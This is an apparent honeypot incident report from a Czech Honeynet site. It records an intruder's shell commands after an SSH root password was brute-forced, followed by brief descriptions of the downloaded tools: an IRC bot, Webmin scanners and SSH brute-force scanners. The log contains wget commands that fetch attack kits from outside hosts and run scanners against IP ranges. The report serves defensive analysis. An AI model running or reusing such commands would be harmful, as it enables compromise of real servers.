logo-honeynet.cz

Hackers inside

2007-05-07 20:38:57

After success guess password to root account with directory BF attack and adding user roman Commands:

<pre>
wget http://rengeri.xhost.ro/boti.tar tar xzvf boti.tar cd " " ./linux cd cat /proc/cpuinfo w ls cd /tmp ls cd cat /proc/cpuinfo wget www.parazit.eu/p/john.tgz tar xzvf john.tgz cd scan-webmin ls ./scan 203.5 cd ls rm -rf john.tgz scan-webmin wget myliftclub.com/xxxz.gz tar xzvf xxxz.gz cd x chmod +x * chmod +w * ./go 201.91 ./go 201.91 cd wget http://sirdulce.xhost.ro/Noteam.tgz tar xzvf Noteam.tgz cd "... " ./x 201.91 ./x 201.91 22 ./x 38.119 22 w ls wget http://sirdulce.xhost.ro/zH.tar.gz tar xzvf zH.tar.gz cd zH mv data.conf.txt data.conf ./start 201 cat vuln.txt cd zH cat vuln.txt w
</pre>

http://rengeri.xhost.ro/boti.tar

Emech irc bot nakonfigurován pro pÅ™ipojení na následující Undernet servery kanál #Snifer:

SERVER diemen.nl.eu.undernet.org 6660
SERVER diemen.nl.eu.undernet.org 6667
SERVER diemen.nl.eu.undernet.org 6669
SERVER lelystad.nl.eu.undernet.org 6666
SERVER lelystad.nl.eu.undernet.org 6667
SERVER lelystad.nl.eu.undernet.org 6668
SERVER london2.uk.eu.undernet.org 6660
SERVER london2.uk.eu.undernet.org 6669
SERVER london2.uk.eu.undernet.org 7000
SERVER graz.at.eu.undernet.org 6660
SERVER graz.at.eu.undernet.org 6670
SERVER graz.at.eu.undernet.org 7000
SERVER helsinki.fi.eu.undernet.org 6666
SERVER helsinki.fi.eu.undernet.org 6669
SERVER helsinki.fi.eu.undernet.org 7000
SERVER montreal.qc.ca.undernet.org 6665
SERVER montreal.qc.ca.undernet.rog 6669
SERVER montreal.qc.ca.undernet.org 7000
SERVER oslo2.no.eu.undernet.org 6660
SERVER oslo2.no.eu.undernet.org 6669
SERVER oslo2.no.eu.undernet.org 7000

And redirection to this channels:
channel #allein
channel #bochum
channel #Beby
channel #radioeclipsa
channel #Ha<E7>k m3n

www.parazit.eu/p/john.tgz

Webmin scanner, link http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html, no other comment needed...

myliftclub.com/xxxz.gz

Extended webmin scanner connected to John The Ripper and used exploit to xml

http://sirdulce.xhost.ro/Noteam.tgz

Ssh brute force scanner with directory contains skripts for scan to Horde servers.

Header:
<pre>
"#=====#==================================#======#" "#= Z =# SSH-BREAKER SECURITY-ATACK V-4.1 #= Z =#" "#= i =#--------- #Noteam ---------#= i =#" "#= D =#-----------------------------------#= D =#" "#= a =# ® ALL RIGHTS RESERVED BY SirDulcee®#= a =#" "#= N =#===================================#= N =#"
</pre>

http://sirdulce.xhost.ro/zH.tar.gz

Next ssh scanner, header:
UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]

Back

©2005-2010  Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Czech Republic License. info_at_honeynet_dot_cz, irc.honeynet.cz #honeynet.cz